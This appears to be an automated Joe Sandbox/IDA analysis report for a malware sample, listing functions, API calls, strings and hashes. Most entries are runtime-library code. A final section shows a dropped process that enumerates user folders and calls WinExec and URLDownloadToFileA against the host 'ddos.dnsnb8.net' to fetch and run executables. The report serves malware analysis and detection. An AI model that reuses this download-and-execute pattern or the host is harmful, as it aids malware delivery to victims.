Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: File$CloseCreateExecHandleWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$rbQTKRDg.exe
API String ID: 3741012433-3835159777
Opcode ID: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction ID: 0fad939afa1a3e6eef74dcea6ddb39993472a9db8089d9d8a1791b0fffe143ca
Opcode Fuzzy Hash: 2fb4e868c1dacf4118042ed468dbdf65dff8f093e3e8aa25e0eda2f0464a3d80
Instruction Fuzzy Hash: 1C611978D00215ABCF24CF94D848AEEBBB0BB94315F2582ABD505A7741C7789EC1CB99

Function 004014E0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 0040150B
__open.LIBCMT ref: 0040157A
_fprintf.LIBCMT ref: 0040159C
__read.LIBCMT ref: 004015CC
__close.LIBCMT ref: 004015D9
_strncmp.LIBCMT ref: 00401617
_calloc.LIBCMT ref: 004016A9
__execv.LIBCMT ref: 0040173B
_fprintf.LIBCMT ref: 00401752

Strings

Cannot open %s, xrefs: 0040158E
-script.pyw, xrefs: 00401558
Cannot find Python executable %s, xrefs: 00401687
#!python.exe, xrefs: 00401623
Could not exec %s, xrefs: 00401744

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
String ID: #!python.exe$-script.pyw$Cannot find Python executable %s$Cannot open %s$Could not exec %s
API String ID: 2502740745-3972628896
Opcode ID: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction ID: 796e4f919e2f8e9c448ad3e98618f95884ab6d66caa4008a2a0434ec9930ee7c
Opcode Fuzzy Hash: c8bd083479423ee5b9adf750b0dfbc56fca52a883853dc4c193cfd766892fb70
Instruction Fuzzy Hash: A07136719043419BD320EF65D885B9B73E8AFD8304F14493EF489A73E1E639E9448B9B

Function 004021B8 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 004021C0

Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406AFB,000000FF,0000001E,?,0040399D,?,00000001,?,?,00403E83,00000018), ref: 00402197
Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7

ExitProcess.KERNEL32 ref: 004021C9

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

Function 004064D7 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004064EC

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction ID: fc63dde57cecbdf2c2aaf7bb1ec022fcb12f636a59951f49be284e9b9c4476cd
Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
Instruction Fuzzy Hash: A9D05E72A903455AEB145F75BE08B623BDCD784795F00843AB80DC6190E5B4D5609948

Function 004023D4 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 004023E0

Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A

Non-executed Functions

Function 00401EE2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00404454
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404469
UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404474
GetCurrentProcess.KERNEL32(C0000409), ref: 00404490
TerminateProcess.KERNEL32(00000000), ref: 00404497

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction ID: a2c1d01f0a8fc7b860fa4c5ba8dee9755c81e3f17099ada6bc54c17834eb60e6
Opcode Fuzzy Hash: 23da0d9ffc51f7e3674ec70a0344f5b5beb142691558593c3537b45a2856aa59
Instruction Fuzzy Hash: 3E21FEB4401210EFD740DF65FA856893BB4FB48300F1184BAEA08E76B0E3F859A48F1D

Function 00406000 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005FBE), ref: 00406005

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction ID: 276ab158461ab0854dff8c4ba172e82da5abdd5be2fa13cd776f410961e88b47
Opcode Fuzzy Hash: 03e2138c96defe5f6c4322f41c97ea28f6cc5d0ca766cf02e782f863edac97cf
Instruction Fuzzy Hash: 7890026125252196D60027715E0968776D49A5960676109716212E4094DABC8054991A

Function 00417B71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49

Function 004010A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsplitpath.LIBCMT ref: 004010FA
__wsplitpath.LIBCMT ref: 00401133
__wmakepath.LIBCMT ref: 00401186
_calloc.LIBCMT ref: 00401192
_strncpy.LIBCMT ref: 004011A7
_calloc.LIBCMT ref: 004011B8
_strncpy.LIBCMT ref: 004011C6

Strings

\, xrefs: 0040114B
\, xrefs: 0040110D

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: __wsplitpath_calloc_strncpy$__wmakepath
String ID: \$\
API String ID: 550690-164819647
Opcode ID: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction ID: ff4e68a8fe18fc9b97d4bba43c3c323c9ca1ce8c53413bd27601e723a30b8d8d
Opcode Fuzzy Hash: 6b08398ac8986faab224cc4e25f628c45a334c78e1b91678b68513e9d93174b4
Instruction Fuzzy Hash: 9F316CB1404380AED325DB10CC81FEBB3E8AF89704F04496EF7C567191E378994887AB

Function 00401350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60processsynchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401375
SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
_fprintf.LIBCMT ref: 004013C7
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5

Strings

failed to create process., xrefs: 004013B9
D, xrefs: 00401384
failed to get exit code from process., xrefs: 004013FF

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
String ID: D$failed to create process.$failed to get exit code from process.
API String ID: 1493708761-2047806753
Opcode ID: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction ID: 34a530c21fcf4aab6bb134418fb42986268233c3b95e978881f8daa222adcb36
Opcode Fuzzy Hash: d0de34054ce82bd43d2fe410723fc00cfad17156a394d383c3c61f2657a6dedf
Instruction Fuzzy Hash: D31191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A

Function 004046C5 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004046D1

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__amsg_exit.LIBCMT ref: 004046F1
__lock.LIBCMT ref: 00404701
InterlockedDecrement.KERNEL32(?), ref: 0040471E
InterlockedIncrement.KERNEL32(00941688), ref: 00404749

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction ID: 762af939121588747dd0ca135b41566db6ae5fc7b386992e2f1cba590a1bc26f
Opcode Fuzzy Hash: bfb2d015a437bf2f75142ed56999e104d6438876da5dba3a6470cb0087768ea4
Instruction Fuzzy Hash: EE01EDB1901621ABC720AF2698067AE7664BB41755F04813BEA60772D0CB3C6D01CFDD

Function 00403ABD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00403ADB

Part of subcall function 00403EF9: __mtinitlocknum.LIBCMT ref: 00403F0F
Part of subcall function 00403EF9: __amsg_exit.LIBCMT ref: 00403F1B
Part of subcall function 00403EF9: EnterCriticalSection.KERNEL32(?,?,?,004019E7,?), ref: 00403F23

___sbh_find_block.LIBCMT ref: 00403AE6
___sbh_free_block.LIBCMT ref: 00403AF5
HeapFree.KERNEL32(00000000,?,0040F578,0000000C,0040515F,00000000,?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C), ref: 00403B25
GetLastError.KERNEL32(?,0040399D,?,00000001,?,?,00403E83,00000018,0040F5E0,0000000C,00403F14,?,?,?,004019E7,?), ref: 00403B36

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction ID: 0fc8657c13906ab74fcdd902c6ebe0ed0f7107b6a60225d746b313d4028bb8d5
Opcode Fuzzy Hash: a12cb5a377b960506db2246119b09161ccaed8dd57b3f76921e50dc72fc51c3a
Instruction Fuzzy Hash: 64015EB1941305AADA306FA2980AB5B7E689B0072AF10853FF104B61C2CA7C9A408A5C

Function 00401410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 00401469
_sprintf.LIBCMT ref: 00401477
_sprintf.LIBCMT ref: 004014A9

Strings

%s, xrefs: 004014A3

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: _sprintf$_calloc
String ID: %s
API String ID: 1847391153-3874713491
Opcode ID: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction ID: 3e0aaedb16861467738b36e15ffebac14c8137eedcf37fbcf32618918a6528ec
Opcode Fuzzy Hash: 506ba3259ec5662ead1a3bac2a13b86467e90f765512d11c77d13c91b1884411
Instruction Fuzzy Hash: B72138312042025FC311CF1CC494EE6B3E69F86348F15456AF885EB2B2DA76E90E87D5

Function 0040A2E4 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A318
__isleadbyte_l.LIBCMT ref: 0040A34C
MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A37D
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A3EB

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction ID: ecb9902cf17e40a010e2e2b1b54a430317f3bb45ddcf6aa4964fa5cd43223a8d
Opcode Fuzzy Hash: 4f57c0c18d61a66ad97d6be7dec4c5e608a13d2facb429ccd72208ac479570c4
Instruction Fuzzy Hash: C531D031A00346EFDB20DF64C8949AE3BA5FF01310B1589BAE861AB2D1D734DD60DB5A

Function 00404E31 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00404E3D

Part of subcall function 0040516E: __getptd_noexit.LIBCMT ref: 00405171
Part of subcall function 0040516E: __amsg_exit.LIBCMT ref: 0040517E

__getptd.LIBCMT ref: 00404E54
__amsg_exit.LIBCMT ref: 00404E62
__lock.LIBCMT ref: 00404E72

Memory Dump Source

Source File: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_aRxo3E278B.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction ID: 09d2f9d651c6c409bc02885c121a8a6903a39f7021fc6d6957eb733fdf563978
Opcode Fuzzy Hash: 3dcc82b5a170c8cf9336be6d49bee876bb3b912368579d21efbebef048838667
Instruction Fuzzy Hash: ADF062B69407008AD630BB75D80674F76907F40725F15823FF6407B2D2CB7C5901CA99

Analysis Process: rbQTKRDg.exePID: 5580, Parent PID: 2936COMMON

Execution Graph

Execution Coverage:	32.2%
Dynamic/Decrypted Code Coverage:	10.7%
Signature Coverage:	18.8%
Total number of Nodes:	298
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008F29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008F2A02
wsprintfA.USER32 ref: 008F2A1A
memset.MSVCRT ref: 008F2A44
lstrlen.KERNEL32(?), ref: 008F2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 008F2A6C
strrchr.MSVCRT ref: 008F2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 008F2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 008F2AAE
memset.MSVCRT ref: 008F2AC6
memset.MSVCRT ref: 008F2ADA
FindFirstFileA.KERNEL32(?,?), ref: 008F2AEF
memset.MSVCRT ref: 008F2B13
lstrcmpiA.KERNEL32(?,?), ref: 008F2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 008F2B67
FindClose.KERNEL32(00000000), ref: 008F2B6E

Strings

C:\, xrefs: 008F2A2F
%s*, xrefs: 008F2A14
Documents and Settings, xrefs: 008F2A8D, 008F2A92, 008F2A9A, 008F2AAD

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: e69d4f391a638ccc7b23ce1e16b97cbf1def01e430382637bc64a4a5caf51c0c
Instruction ID: b50b13a324038cd7b4d41dca6797d7a92135881bc05b52203003aaaddf2ecef8
Opcode Fuzzy Hash: e69d4f391a638ccc7b23ce1e16b97cbf1def01e430382637bc64a4a5caf51c0c
Instruction Fuzzy Hash: 464130B240464DAFD721EBB4DC49DFB77ACFB84315F04092AFA44D2111EA34D658CBA2

Function 008F1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008F185B: GetSystemTimeAsFileTime.KERNEL32(008F1F92,00000000,?,00000000,?,?,?,008F1F92,?,00000000,00000002), ref: 008F1867
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1878
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1880
Part of subcall function 008F185B: srand.MSVCRT ref: 008F1890
Part of subcall function 008F185B: rand.MSVCRT ref: 008F1894

WinExec.KERNEL32(?,00000005), ref: 008F10F1
lstrlen.KERNEL32(008F4748), ref: 008F10FA
wsprintfA.USER32 ref: 008F112A
wsprintfA.USER32 ref: 008F1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 008F115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 008F1169
Sleep.KERNEL32 ref: 008F1179

Strings

%s%.8X.exe, xrefs: 008F1124
C:\Users\user\AppData\Local\Temp\, xrefs: 008F1119
cj/, xrefs: 008F1135
http://%s:%d/%s/%s, xrefs: 008F10C2, 008F1141
ddos.dnsnb8.net, xrefs: 008F10C8, 008F10CF, 008F1140, 008F1168

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
